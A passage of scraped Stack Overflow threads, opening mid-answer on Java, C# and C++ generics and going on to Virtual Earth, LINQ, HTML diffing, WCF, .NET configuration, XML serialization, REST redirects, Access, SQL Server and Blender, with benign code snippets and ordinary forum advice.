The difference is what happens behind the scenes. Unlike C#, Java does not go and build a special ListOfPerson - it just uses the plain old ArrayList which has always been in Java. When you get things out of the array, the usual Person p = (Person)foo.get(1); casting-dance still has to be done. The compiler is saving you the key-presses, but the speed hit/casting is still incurred just like it always was. When people mention "Type Erasure" this is what they're talking about. The compiler inserts the casts for you, and then 'erases' the fact that it's meant to be a list of Person not just Object The benefit of this approach is that old code which doesn't understand generics doesn't have to care. It's still dealing with the same old ArrayList as it always has. This is more important in the java world because they wanted to support compiling code using Java 5 with generics, and having it run on old 1.4 or previous JVM's, which microsoft deliberately decided not to bother with. The downside is the speed hit I mentioned previously, and also because there is no ListOfPerson pseudo-class or anything like that going into the .class files, code that looks at it later on (with reflection, or if you pull it out of another collection where it's been converted into Object or so on) can't tell in any way that it's meant to be a list containing only Person and not just any other array list. C++ Templates allow you to declare something like this std::list<Person>* foo = new std::list<Person>(); It looks like C# and Java generics, and it will do what you think it should do, but behind the scenes different things are happening. It has the most in common with C# generics in that it builds special pseudo-classes rather than just throwing the type information away like java does, but it's a whole different kettle of fish. Both C# and Java produce output which is designed for virtual machines. If you write some code which has a Person class in it, in both cases some information about a Person class will go into the .dll or .class file, and the JVM/CLR will do stuff with this. C++ produces raw x86 binary code. Everything is not an object, and there's no underlying virtual machine which needs to know about a Person class. There's no boxing or unboxing, and functions don't have to belong to classes, or indeed anything. Because of this, the C++ compiler places no restrictions on what you can do with templates - basically any code you could write manually, you can get templates to write for you. The most obvious example is adding things: In C# and Java, the generics system needs to know what methods are available for a class, and it needs to pass this down to the virtual machine. The only way to tell it this is by either hard-coding the actual class in, or using interfaces. For example: string addNames<T>( T first, T second ) { return first.Name() + second.Name(); } That code won't compile in C# or Java, because it doesn't know that the type T actually provides a method called Name(). You have to tell it - in C# like this: interface IHasName{ string Name(); }; string addNames<T>( T first, T second ) where T : IHasName { .... } And then you have to make sure the things you pass to addNames implement the IHasName interface and so on. The java syntax is different (<T extends IHasName>), but it suffers from the same problems. 
The 'classic' case for this problem is trying to write a function which does this string addNames<T>( T first, T second ) { return first + second; } You can't actually write this code because there are no ways to declare an interface with the + method in it. You fail. C++ suffers from none of these problems. The compiler doesn't care about passing types down to any VM's - if both your objects have a .Name() function, it will compile. If they don't, it won't. Simple. So, there you have it :-) A: Anders Hejlsberg himself described the differences here "Generics in C#, Java, and C++". A: Wikipedia has great write-ups comparing both Java/C# generics and Java generics/C++ templates. The main article on Generics seems a bit cluttered but it does have some good info in it. A: There are already a lot of good answers on what the differences are, so let me give a slightly different perspective and add the why. As was already explained, the main difference is type erasure, i.e. the fact that the Java compiler erases the generic types and they don't end up in the generated bytecode. However, the question is: why would anyone do that? It doesn't make sense! Or does it? Well, what's the alternative? If you don't implement generics in the language, where do you implement them? And the answer is: in the Virtual Machine. Which breaks backwards compatibility. Type erasure, on the other hand, allows you to mix generic clients with non-generic libraries. In other words: code that was compiled on Java 5 can still be deployed to Java 1.4. Microsoft, however, decided to break backwards compatibility for generics. That's why .NET Generics are "better" than Java Generics. Of course, Sun aren't idiots or cowards. The reason why they "chickened out", was that Java was significantly older and more widespread than .NET when they introduced generics. (They were introduced roughly at the same time in both worlds.) Breaking backwards compatibility would have been a huge pain. Put yet another way: in Java, Generics are a part of the Language (which means they apply only to Java, not to other languages), in .NET they are part of the Virtual Machine (which means they apply to all languages, not just C# and Visual Basic.NET). Compare this with .NET features like LINQ, lambda expressions, local variable type inference, anonymous types and expression trees: these are all language features. That's why there are subtle differences between VB.NET and C#: if those features were part of the VM, they would be the same in all languages. But the CLR hasn't changed: it's still the same in .NET 3.5 SP1 as it was in .NET 2.0. You can compile a C# program that uses LINQ with the .NET 3.5 compiler and still run it on .NET 2.0, provided that you don't use any .NET 3.5 libraries. That would not work with generics and .NET 1.1, but it would work with Java and Java 1.4. A: Follow-up to my previous posting. Templates are one of the main reasons why C++ fails so abysmally at intellisense, regardless of the IDE used. Because of template specialization, the IDE can never be really sure if a given member exists or not. Consider: template <typename T> struct X { void foo() { } }; template <> struct X<int> { }; typedef int my_int_type; X<my_int_type> a; a.| Now, the cursor is at the indicated position and it's damn hard for the IDE to say at that point if, and what, members a has. For other languages the parsing would be straightforward but for C++, quite a bit of evaluation is needed beforehand. It gets worse. 
What if my_int_type were defined inside a class template as well? Now its type would depend on another type argument. And here, even compilers fail. template <typename T> struct Y { typedef T my_type; }; X<Y<int>::my_type> b; After a bit of thinking, a programmer would conclude that this code is the same as the above: Y<int>::my_type resolves to int, therefore b should be the same type as a, right? Wrong. At the point where the compiler tries to resolve this statement, it doesn't actually know Y<int>::my_type yet! Therefore, it doesn't know that this is a type. It could be something else, e.g. a member function or a field. This might give rise to ambiguities (though not in the present case), therefore the compiler fails. We have to tell it explicitly that we refer to a type name: X<typename Y<int>::my_type> b; Now, the code compiles. To see how ambiguities arise from this situation, consider the following code: Y<int>::my_type(123); This code statement is perfectly valid and tells C++ to execute the function call to Y<int>::my_type. However, if my_type is not a function but rather a type, this statement would still be valid and perform a special cast (the function-style cast) which is often a constructor invocation. The compiler can't tell which we mean so we have to disambiguate here. A: The biggest complaint is type erasure. In that, generics are not enforced at runtime. Here's a link to some Sun docs on the subject. Generics are implemented by type erasure: generic type information is present only at compile time, after which it is erased by the compiler. A: C++ templates are actually much more powerful than their C# and Java counterparts as they are evaluated at compile time and support specialization. This allows for Template Meta-Programming and makes the C++ compiler equivalent to a Turing machine (i.e. during the compilation process you can compute anything that is computable with a Turing machine). A: In Java, generics are compiler level only, so you get: a = new ArrayList<String>() a.getClass() => ArrayList Note that the type of 'a' is an array list, not a list of strings. So the type of a list of bananas would equal() a list of monkeys. So to speak. A: Looks like, among other very interesting proposals, there is one about refining generics and breaking backwards compatibility: Currently, generics are implemented using erasure, which means that the generic type information is not available at runtime, which makes some kind of code hard to write. Generics were implemented this way to support backwards compatibility with older non-generic code. Reified generics would make the generic type information available at runtime, which would break legacy non-generic code. However, Neal Gafter has proposed making types reifiable only if specified, so as to not break backward compatibility. at Alex Miller's article about Java 7 Proposals A: NB: I don't have enough point to comment, so feel free to move this as a comment to appropriate answer. Contrary to popular believe, which I never understand where it came from, .net implemented true generics without breaking backward compatibility, and they spent explicit effort for that. You don't have to change your non-generic .net 1.0 code into generics just to be used in .net 2.0. Both the generic and non-generic lists are still available in .Net framework 2.0 even until 4.0, exactly for nothing else but backward compatibility reason. 
Therefore old code that still used the non-generic ArrayList will still work, and use the same ArrayList class as before. Backward code compatibility has always been maintained, from 1.0 until now... So even in .NET 4.0, you still have the option to use any non-generic class from the 1.0 BCL if you choose to do so. So I don't think Java had to break backward compatibility to support true generics.
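As a footnote to the erasure discussion above, this little Java program makes the difference tangible (the analogous typeof(List<string>) == typeof(List<int>) comparison in C# reports false, because the CLR really does build distinct constructed types):

import java.util.ArrayList;
import java.util.List;

public class ErasureDemo {
    public static void main(String[] args) {
        List<String> strings = new ArrayList<String>();
        List<Integer> ints = new ArrayList<Integer>();
        // The type arguments were erased at compile time, so at runtime
        // both lists share exactly the same class object.
        System.out.println(strings.getClass() == ints.getClass()); // true
    }
}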
{ "language": "en", "url": "https://stackoverflow.com/questions/31693", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "203" }
Q: How to control layer ordering in Virtual Earth I have a mapping application that needs to draw a path, and then display icons on top of the path. I can't find a way to control the order of virtual earth layers, other than the order in which they are added. Does anyone know how to change the z index of Virtual Earth shape layers, or force a layer to the front? A: I think the easiest way is to iterate through the shapes in your VEShapeLayer and use the VEShape.SetZIndex method. A: If you are using JQuery you can use the following $('#' + yourlayer.iid).children(".VEAPI_Pushpin").css('zIndex', 2000); ...remember that the default zIndex for a VEShape is 1000
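Going back to the SetZIndex suggestion, the iteration would look something like this. The sketch assumes the VE 6.x methods VEShapeLayer.GetShapeCount() and VEShapeLayer.GetShapeByIndex(), and I'm not certain of the SetZIndex parameter order (icon z-index vs. polyline z-index), so check that against the SDK:

function bringLayerToFront(layer) {
    for (var i = 0; i < layer.GetShapeCount(); i++) {
        // The default shape z-index is 1000, so anything above that wins.
        layer.GetShapeByIndex(i).SetZIndex(2000, 2000);
    }
}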
{ "language": "en", "url": "https://stackoverflow.com/questions/31701", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: How can I convert IEnumerable to List in C#? I am using LINQ to query a generic dictionary and then use the result as the datasource for my ListView (WebForms). Simplified code:

Dictionary<Guid, Record> dict = GetAllRecords();
myListView.DataSource = dict.Values.Where(rec => rec.Name == "foo");
myListView.DataBind();

I thought that would work but in fact it throws a System.InvalidOperationException:

ListView with id 'myListView' must have a data source that either implements ICollection or can perform data source paging if AllowPaging is true.

In order to get it working I have had to resort to the following:

Dictionary<Guid, Record> dict = GetAllRecords();
List<Record> searchResults = new List<Record>();
var matches = dict.Values.Where(rec => rec.Name == "foo");
foreach (Record rec in matches)
    searchResults.Add(rec);
myListView.DataSource = searchResults;
myListView.DataBind();

Is there a small gotcha in the first example to make it work? (Wasn't sure what to use as the question title for this one, feel free to edit to something more appropriate) A: I tend to prefer using the new Linq syntax:

myListView.DataSource = (
    from rec in GetAllRecords().Values
    where rec.Name == "foo"
    select rec
).ToList();
myListView.DataBind();

Why are you getting a dictionary when you don't use the key? You're paying for that overhead. A: You might also try:

var matches = new List<Record>(dict.Values.Where(rec => rec.Name == "foo"));

Basically generic collections are very difficult to cast directly, so you really have little choice but to create a new object. A: Try this:

var matches = dict.Values.Where(rec => rec.Name == "foo").ToList();

Be aware that that will essentially be creating a new list from the original Values collection, and so any changes to your dictionary won't automatically be reflected in your bound control. A:

myListView.DataSource = dict.Values.Where(rec => rec.Name == "foo").ToList();

A: Just adding a note: the next statement on its own doesn't actually retrieve any data from the database. It only creates the query (that's why its type can be IQueryable). To launch the query you must add .ToList() or .First() at the end:

dict.Values.Where(rec => rec.Name == "foo")
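To see the deferred execution in action with the dict from the question:

var matches = dict.Values.Where(rec => rec.Name == "foo"); // no work happens yet
List<Record> snapshot = matches.ToList(); // query runs here; List implements ICollection
dict.Clear();
// snapshot.Count is unchanged, but enumerating 'matches' now yields nothing.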
{ "language": "en", "url": "https://stackoverflow.com/questions/31708", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "17" }
Q: How to plot a long path with Virtual Earth The obvious way to plot a path with virtual earth (VEMap.GetDirections) is limited to 25 points. When trying to plot a vehicle's journey this is extremely limiting. How can I plot a by-road journey of more than 25 points on a virtual earth map? A: According to this you need to call VEMap.GetDirections every 25 points until you reach the end of the route and then plot a custom shape of the complete route.
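A rough sketch of the chunking this implies, with consecutive legs sharing an endpoint so they join up (VEMap.GetDirections is asynchronous in practice, so a real implementation would collect each leg's geometry in a callback and finally draw one VEShape polyline over the whole route):

function routeLegs(points) {
    var legs = [];
    for (var i = 0; i < points.length - 1; i += 24) {
        legs.push(points.slice(i, i + 25)); // at most 25 points per leg
    }
    return legs;
}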
{ "language": "en", "url": "https://stackoverflow.com/questions/31711", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
Q: Anyone have a diff algorithm for rendered HTML? I'm interested in seeing a good diff algorithm, possibly in Javascript, for rendering a side-by-side diff of two HTML pages. The idea would be that the diff would show the differences of the rendered HTML. To clarify, I want to be able to see the side-by-side diffs as rendered output. So if I delete a paragraph, the side by side view would know to space things correctly. @Josh exactly. Though maybe it would show the deleted text in red or something. The idea is that if I use a WYSIWYG editor for my HTML content, I don't want to have to switch to HTML to do diffs. I want to do it with two WYSIWYG editors side by side maybe. Or at least display diffs side-by-side in an end-user friendly matter. A: I ended up needing something similar awhile back. To get the HTML to line up side to side, you could use two iFrames, but you'd then have to tie their scrolling together via javascript as you scroll (if you allow scrolling). To see the diff, however, you will more than likely want to use someone else's library. I used DaisyDiff, a Java library, for a similar project where my client was happy with seeing a single HTML rendering of the content with MS Word "track changes"-like markup. HTH A: Consider using the output of links or lynx to render a text-only version of the html, and then diff that. A: What about DaisyDiff (Java and PHP vesions available). Following features are really nice: * *Works with badly formed HTML that can be found "in the wild". *The diffing is more specialized in HTML than XML tree differs. Changing part of a text node will not cause the entire node to be changed. *In addition to the default visual diff, HTML source can be diffed coherently. *Provides easy to understand descriptions of the changes. *The default GUI allows easy browsing of the modifications through keyboard shortcuts and links. A: There's another nice trick you can use to significantly improve the look of a rendered HTML diff. Although this doesn't fully solve the initial problem, it will make a significant difference in the appearance of your rendered HTML diffs. Side-by-side rendered HTML will make it very difficult for your diff to line up vertically. Vertical alignment is crucial for comparing side-by-side diffs. In order to improve the vertical alignment of a side-by-side diff, you can insert invisible HTML elements in each version of the diff at "checkpoints" where the diff should be vertically aligned. Then you can use a bit of client-side JavaScript to add vertical spacing around checkpoint until the sides line up vertically. Explained in a little more detail: If you want to use this technique, run your diff algorithm and insert a bunch of visibility:hidden <span>s or tiny <div>s wherever your side-by-side versions should match up, according to the diff. Then run JavaScript that finds each checkpoint (and its side-by-side neighbor) and adds vertical spacing to the checkpoint that is higher-up (shallower) on the page. Now your rendered HTML diff will be vertically aligned up to that checkpoint, and you can continue repairing vertical alignment down the rest of your side-by-side page. A: Over the weekend I posted a new project on codeplex that implements an HTML diff algorithm in C#. The original algorithm was written in Ruby. I understand you were looking for a JavaScript implementation, perhaps having one available in C# with source code could assist you to port the algorithm. Here is the link if you are interested: htmldiff.codeplex.com. 
You can read more about it here. UPDATE: This library has been moved to GitHub. A: So, you expect <font face="Arial">Hi Mom</font> and <span style="font-family:Arial;">Hi Mom</span> to be considered the same? The output depends very much on the User Agent. Like Ionut Anghelcovici suggests, make an image. Do one for every browser you care about. A: Use the markup mode of Pretty Diff for HTML. It is written entirely in JavaScript. http://prettydiff.com/ A: If it is XHTML (which assumes a lot on my part) would the Xml Diff Patch Toolkit help? http://msdn.microsoft.com/en-us/library/aa302294.aspx A: For smaller differences you might be able to do a normal text-diff, and then analyse the missing or inserted pieces to see how to resolve it, but for any larger differences you're going to have a very tough time doing this. For instance, how would you detect, and show, that a left-aligned image (floating left of a paragraph of text) has suddenly become right-aligned? A: Using a text differ will break on non-trivial documents. Depending on what you think is intuitive, XML differs will probably generate diffs that aren't very good for text with markup. AFAIK, DaisyDiff is the only library specialized in HTML. It works great for a subset of HTML. A: If you were working with Java and XHTML, XMLUnit allows you to compare two XML documents via the org.custommonkey.xmlunit.DetailedDiff class: Compares and describes all the differences between two XML documents. The document comparison does not stop once the first unrecoverable difference is found, unlike the Diff class. A: I believe a good way to do this is to render the HTML to an image and then use some diff tool that can compare images to spot the differences.
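Coming back to the invisible-checkpoint idea from an earlier answer, here is a bare-bones sketch of the alignment pass. The diff-checkpoint class and the data-cp pairing attribute are my own invention; any scheme that pairs checkpoints across the two sides will do:

function alignCheckpoints(leftRoot, rightRoot) {
    var lefts = leftRoot.querySelectorAll('.diff-checkpoint');
    for (var i = 0; i < lefts.length; i++) {
        var id = lefts[i].getAttribute('data-cp');
        var right = rightRoot.querySelector('.diff-checkpoint[data-cp="' + id + '"]');
        if (!right) continue;
        // Pad whichever checkpoint sits higher until the pair lines up.
        var dy = lefts[i].getBoundingClientRect().top -
                 right.getBoundingClientRect().top;
        var shallow = dy < 0 ? lefts[i] : right;
        shallow.style.display = 'block'; // keep visibility:hidden in the CSS
        shallow.style.height = Math.abs(dy) + 'px';
    }
}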
{ "language": "en", "url": "https://stackoverflow.com/questions/31722", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "90" }
Q: How many ServiceContracts can a WCF service have? Specifically, since a ServiceContract is an attribute to an interface, how many interfaces can I code into one WCF web service? Is it a one-to-one? Does it make sense to separate the contracts across multiple web services? A: WCF services can have multiple endpoints, each of which can implement a different service contract. For example, you could have a service declared as follows:

[ServiceBehavior(Namespace = "DemoService")]
public class DemoService : IDemoService, IDoNothingService

Which would have configuration along these lines:

<service name="DemoService" behaviorConfiguration="Debugging">
  <host>
    <baseAddresses>
      <add baseAddress="http://localhost/DemoService.svc" />
    </baseAddresses>
  </host>
  <endpoint address="" binding="customBinding" bindingConfiguration="InsecureCustom"
            bindingNamespace="http://schemas.com/Demo" contract="IDemoService"/>
  <endpoint address="" binding="customBinding" bindingConfiguration="InsecureCustom"
            bindingNamespace="http://schemas.com/Demo" contract="IDoNothingService"/>
</service>

Hope that helps, but if you were after the theoretical maximum interfaces you can have for a service I suspect it's some crazily large multiple of 2. A: You can have a service implement all the service contracts you want. I mean, I don't know if there is a limit, but I don't think there is. That's a neat way to separate operations that will be implemented by the same service in several conceptually different service contract interfaces. A: @jdiaz Of course you should strive to have very different business matters in different services, but consider the case in which you want that, for example, all your services implement a GetVersion() operation. You could have a service contract just for that operation and have every service implement it, instead of adding the GetVersion() operation to the contract of all your services. A: A service can theoretically have any number of Endpoints, and each Endpoint is bound to a particular contract, or interface, so it is possible for a single conceptual (and configured) service to host multiple interfaces via multiple endpoints or alternatively for several endpoints to host the same interface. If you are using the ServiceHost class to host your service, though, instead of IIS, you can only associate a single interface per ServiceHost. I'm not sure why this is the case, but it is.
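A minimal self-hosting sketch you can use to try this out for yourself, reusing the DemoService and contracts from the first answer (the binding and addresses are illustrative only):

using System;
using System.ServiceModel;

class Program
{
    static void Main()
    {
        var host = new ServiceHost(typeof(DemoService),
            new Uri("http://localhost:8000/Demo"));
        // One endpoint per contract, both implemented by DemoService.
        host.AddServiceEndpoint(typeof(IDemoService), new BasicHttpBinding(), "main");
        host.AddServiceEndpoint(typeof(IDoNothingService), new BasicHttpBinding(), "noop");
        host.Open();
        Console.WriteLine("Two contracts, one host. Press Enter to stop.");
        Console.ReadLine();
        host.Close();
    }
}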
{ "language": "en", "url": "https://stackoverflow.com/questions/31790", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: Help accessing application settings using ConfigurationManager In .NET Framework 1.1, I use

System.Configuration.ConfigurationSettings.AppSettings["name"];

for application settings. But in .NET 2.0, it says ConfigurationSettings is obsolete and to use ConfigurationManager instead. So I swapped it out with this:

System.Configuration.ConfigurationManager.AppSettings["name"];

The problem is, ConfigurationManager was not found in the System.Configuration namespace. I've been banging my head against the wall trying to figure out what I'm doing wrong. Anybody got any ideas? A: You have to reference the System.configuration assembly (note the lowercase). I don't know why this assembly is not added by default to new projects in Visual Studio, but I find myself having the same problem every time I start a new project. I always forget to add the reference. A: If you're just trying to get a value from the app.config file, you might want to use:

ConfigurationSettings.AppSettings["name"];

That works for me, anyways. /Jonas A: You are missing the reference to System.Configuration. A: Visual Studio doesn't make it obvious which assembly reference you need to add. One way to find out would be to look up ConfigurationManager in the MSDN Library. At the top of the "about ConfigurationManager class" page it tells you which assembly and DLL the class is in. A: The System.Configuration namespace lives in the System.configuration assembly (note the lower-case 'configuration' in the file name); in .NET 2.0 this refers to System.Configuration.dll, which you must reference explicitly.
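Once the reference is added, the code from the question works as-is:

// Project > Add Reference > .NET tab > System.Configuration
using System.Configuration;

string name = ConfigurationManager.AppSettings["name"];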
{ "language": "en", "url": "https://stackoverflow.com/questions/31794", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: Preventing XML Serialization of IEnumerable and ICollection & Inherited Types NOTE: XMLIgnore is NOT the answer! OK, so following on from my question on XML Serialization and Inherited Types, I began integrating that code into my application I am working on, stupidly thinking all will go well.. I ran into problems with a couple of classes I have that implement IEnumerable and ICollection<T> The problem with these is that when the XMLSerializer comes to serialize these, it views them as an external property, and instead of using the property we would like it to (i.e. the one with our AbstractXmlSerializer ) it comes here and falls over (due to the type mismatch), pretty much putting us back to square one. You cannot decorate these methods with the XmlIgnore attribute either, so we cannot stop it that way. My current solution is to remove the interface implementation (in this current application, its no real big deal, just made the code prettier). Do I need to swallow my pride on this one and accept it cant be done? I know I have kinda pushed and got more out of the XmlSerializer than what was expected of it :) Edit I should also add, I am currently working in framework 2. Update I have accepted lomaxx's answer. In my scenario I cannot actually do this, but I do know it will work. Since their have been no other suggestions, I ended up removing the interface implementation from the code. A: you can get around this problem by getting hold of the System.RunTime.Serialization dll (it's a .net 3.x assembly) and referencing it from your .net 2.0 application. This works because the .net 3.0 binaries are compiled to run on the .net 2.0 CLR. By doing this, you get access to the DataContractSerliazer which I've used to get around a similar problem where I wanted to pass in a ICollection as a parameter to a webservice and the xmlserializer didn't know how to deal with it properly. If you're cool with using the .net 3.x dll in your 2.x application you should be able to use the DataContractSerializer to solve this problem A: i guess the answer is coming too late to be useful for your particular application, but maybe there are other people having the same problem. i suppose you can implement IXmlSerializable for the IEnumerable type to work around this behaviour. however, this means you have to fully control the serialization process for this type. a simple approach for not having to mess with the XmlReader / XmlWriter, you can write a helper xml adapter class with public ctor and public read-write-properties of all the data to be serialized, and create a temporary XmlSerializer object for this type inside IXmlSerializable.[Read|Write]Xml(). class Target : IEnumerable<Anything>, IXmlSerializable { //... 
    public void ReadXml(System.Xml.XmlReader reader)
    {
        reader.ReadStartElement();
        TargetXmlAdapter toRead = (TargetXmlAdapter)new XmlSerializer(typeof(TargetXmlAdapter)).Deserialize(reader);
        reader.Read();
        // here: install state from TargetXmlAdapter
    }

    public void WriteXml(System.Xml.XmlWriter writer)
    {
        // NOTE: TargetXmlAdapter(Target) is supposed to store this instance's
        // state that is subject to serialization
        new XmlSerializer(typeof(TargetXmlAdapter)).Serialize(writer, new TargetXmlAdapter(this));
    }
}

A: If you use these attributes:

[XmlArray("ProviderPatientLists")]
[XmlArrayItem("File")]
public ProviderPatientList Files
{
    get { return _ProviderPatientLists; }
    set { _ProviderPatientLists = value; }
}

where ProviderPatientList inherits from List<PatientList>, you then have more control over the XML that will be created.
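For reference, that attribute pair shapes the serialized output along these lines (element contents invented):

<ProviderPatientLists>
  <File>...</File>
  <File>...</File>
</ProviderPatientLists>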
{ "language": "en", "url": "https://stackoverflow.com/questions/31799", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: How to respond to an alternate URI in a RESTful web service I'm building a RESTful web service which has multiple URIs for one of its resources, because there is more than one unique identifier. Should the server respond to a GET request for an alternate URI by returning the resource, or should I send an HTTP 3xx redirect to the canonical URI? Is HTTP 303 (see also) the most appropriate redirect? Clarification: the HTTP specification makes it clear that the choice of redirect depends on which URI future requests should use. In my application, the 'canonical' URI is the most stable of the alternatives; an alternative URI will always direct to the same canonical URI, or become invalid. A: I'd personally plump for returning the resource rather than faffing with a redirect, although I suspect that's only because my subconscious is telling me redirects are slower. However, if you were to decide to use a redirect I'd think a 302 or 307 might be more appropriate than a 303, although the w3.org has details of the different redirect codes you could use. A: Under W3C's Architecture of the World Wide Web, Volume One, there is a section on URI aliases (Section 2.3.1) which states the following: "When a URI alias does become common currency, the URI owner should use protocol techniques such as server-side redirects to relate the two resources. The community benefits when the URI owner supports redirection of an aliased URI to the corresponding "official" URI. For more information on redirection, see section 10.3, Redirection, in RFC2616. See also CHIPS for a discussion of some best practices for server administrators." For what it's worth, I would recommend a 302 redirect. A: The answer from Ubiguchi had what I needed, except that I now think a redirect is the way to go, via the link to the HTTP 1.1 specification section on response codes. It turns out that I actually need a 301 redirect because the URI I'm redirecting to is more 'correct' and stable, and should therefore be used for future requests.
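Concretely, the exchange for an alias would then look like this (paths invented), with the client expected to use the Location URI for future requests:

GET /widgets/by-serial/XYZ123 HTTP/1.1
Host: example.com

HTTP/1.1 301 Moved Permanently
Location: http://example.com/widgets/42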
{ "language": "en", "url": "https://stackoverflow.com/questions/31800", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: Performance issues regarding Access 2003 and the OLE Object data type In MS Access 2003 (I know, I know), I'm using the OLE Object data type to persist the state of some objects that are marked as serializable (just using a IO.BinaryFormatter to serialize to a MemoryStream, and then saving that to the db as a Byte array). Does this work pretty much like a varbinary, or a blob? Are there any gotchas looming in the shadows that anyone knows about? Any performance advice or war stories? I'd profit from any advice. A: In Access I never figured out how to properly use the OLE Object data type without real performance problems (and structural too -- lots of compact and repair jobs). The solution path I've always taken (mind you I haven't used Access in anger now for years) is to just store the blobs onto disk somewhere and store the file location in the data table. A: I can't answer your specific question, but you might want to look at the GetChunk and AppendChunk methods in Access help, since those are the methods used for writing and manipulating data in binary fields.
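A hedged VBA/DAO sketch of those chunk methods (table and field names invented; verify GetChunk/FieldSize against the Access help topic mentioned above):

Dim rs As DAO.Recordset
Set rs = CurrentDb.OpenRecordset("SELECT ObjState FROM Widgets WHERE ID = 1")
rs.Edit
rs!ObjState.AppendChunk bytes   ' bytes is the serialized Byte array
rs.Update
' Reading it back:
Dim blob() As Byte
blob = rs!ObjState.GetChunk(0, rs!ObjState.FieldSize)
rs.Close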
{ "language": "en", "url": "https://stackoverflow.com/questions/31812", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "0" }
Q: How to find out which Service Pack is installed on SQL Server? How can I find out which Service Pack is installed on my copy of SQL Server? A: Select @@Version Ex: My machine has the following one installed. Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (Intel X86) Apr 2 2010 15:53:02 Copyright (c) Microsoft Corporation Enterprise Edition on Windows NT 6.1 (Build 7601: Service Pack 1) A: From TechNet: Determining which version and edition of SQL Server Database Engine is running -- SQL Server 2000/2005 SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY ('productlevel'), SERVERPROPERTY ('edition') -- SQL Server 6.5/7.0 SELECT @@VERSION
{ "language": "en", "url": "https://stackoverflow.com/questions/31818", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "13" }
Q: Algorithmic complexity of XML parsers/validators I need to know how the performance of different XML tools (parsers, validators, XPath expression evaluators, etc) is affected by the size and complexity of the input document. Are there resources out there that document how CPU time and memory usage are affected by... well, what? Document size in bytes? Number of nodes? And is the relationship linear, polynomial, or worse? Update In an article in IEEE Computer Magazine, vol. 41, no. 9, September 2008, the authors survey four popular XML parsing models (DOM, SAX, StAX and VTD). They run some very basic performance tests which show that a DOM-parser will have its throughput halved when the input file's size is increased from 1-15 KB to 1-15 MB, or about 1000x larger. The throughput of the other models is not significantly affected. Unfortunately they did not perform more detailed studies, such as of throughput/memory usage as a function of number of nodes/size. The article is here. Update I was unable to find any formal treatment of this problem. For what it's worth, I have done some experiments measuring the number of nodes in an XML document as a function of the document's size in bytes. I'm working on a warehouse management system and the XML documents are typical warehouse documents, e.g. advanced shipping notice etc. The graph (omitted here; it was hosted on flickr.com) showed the relationship between the size in bytes and the number of nodes (which should be proportional to the document's memory footprint under a DOM model), with different colors corresponding to different kinds of documents, plotted on a log/log scale; the black line was the best fit to the blue points. It's interesting to note that for all kinds of documents, the relationship between byte size and node size is linear, but that the coefficient of proportionality can be very different. A: If I were faced with that problem and couldn't find anything on Google I would probably try to do it myself. Some "back-of-an-envelope" stuff to get a feel for where it is going. But it would kinda need me to have an idea of how to do an XML parser. For non-algorithmic benchmarks take a look here: * *http://www.xml.com/pub/a/Benchmark/exec.html *http://www.devx.com/xml/Article/16922 *http://xerces.apache.org/xerces2-j/faq-performance.html A: I think there are too many variables involved to come up with a simple complexity metric unless you make a lot of assumptions. A simple SAX style parser should be linear in terms of document size and flat for memory. Something like XPath would be impossible to describe in terms of just the input document since the complexity of the XPath expression plays a huge role. Likewise for schema validation, a large but simple schema may well be linear, whereas a smaller schema that has a much more complex structure would show worse runtime performance. As with most performance questions the only way to get accurate answers is to measure it and see what happens! A: Rob Walker is right: the problem isn't specified in enough detail. Considering just parsers (and ignoring the question of whether they perform validation), there are two main flavors: tree-based—think DOM—and streaming/event-based—think SAX (push) and StAX (pull). Speaking in huge generalities, the tree-based approaches consume more memory and are slower (because you need to finish parsing the whole document), while the streaming/event-based approaches consume less memory and are faster.
Tree-based parsers are generally considered easier to use, although StAX has been heralded as a huge improvement (in ease-of-use) over SAX. A: I was planning to load extremely large XML files in my application. I asked the question here on Stack Overflow: Fastest Possible XML handling for very large documents. And yes, it was the parsing part, that was the bottleneck. I ended up not using XML parsers at all. Instead, I parsed characters one by one as efficiently as possible optimizing for speed. This resulted in speeds of 40 MB per second on a 3 GHz Windows PC for the reading, parsing and loading of the internal data structure. I would be very interested in hearing how the various XML parsing modes compare to this.
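For comparison with the streaming side of that trade-off, a one-pass pull-parser baseline is easy to set up. This Java StAX sketch counts element nodes in time linear in document size and roughly constant memory:

import java.io.FileInputStream;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamReader;

public class NodeCount {
    public static void main(String[] args) throws Exception {
        XMLStreamReader r = XMLInputFactory.newInstance()
                .createXMLStreamReader(new FileInputStream(args[0]));
        long elements = 0;
        while (r.hasNext()) {
            if (r.next() == XMLStreamConstants.START_ELEMENT) {
                elements++; // no tree is built, so memory stays flat
            }
        }
        System.out.println("elements: " + elements);
    }
}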
{ "language": "en", "url": "https://stackoverflow.com/questions/31826", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "15" }
Q: Generating random terrain in Blender3D I tried finding a Python script on Google that will generate a random terrain when the game starts (or each time the player advances to a new scene) but all the tools I found are for creating a terrain to render it, not for the game mode. Any idea how/where to find one? (I'm assuming that since Blender3D has game programming capabilities, it is OK for someone to ask in SO) A: Is this link related? http://blenderartists.org/forum/showthread.php?t=77794 To generate terrain (height map) the algorithm is pretty simple (fractal plasma), something like this algorithm (Java): http://www.sinc.stonybrook.edu/stu/jseyster/plasma/ If you Google search for "fractal plasma python" you might find some example code. A: I've not really worked much with the game engine, but how about generating a random cloud texture and using that to displace the model? Wouldn't that be easier? A: You should be able to reprogram most of the Python scripts available to generate terrain for rendering to generate terrain for your game... is there a specific thing you need from the script to make it suitable for realtime gameplay instead of a static render? A: Simplest way to achieve this is to cheat a little. Instead of actually generating random terrain, make a random cloud texture (not sure how to do that with Python) and then make the displace modifier use that texture, and that's it! I'm not sure it could be much easier.
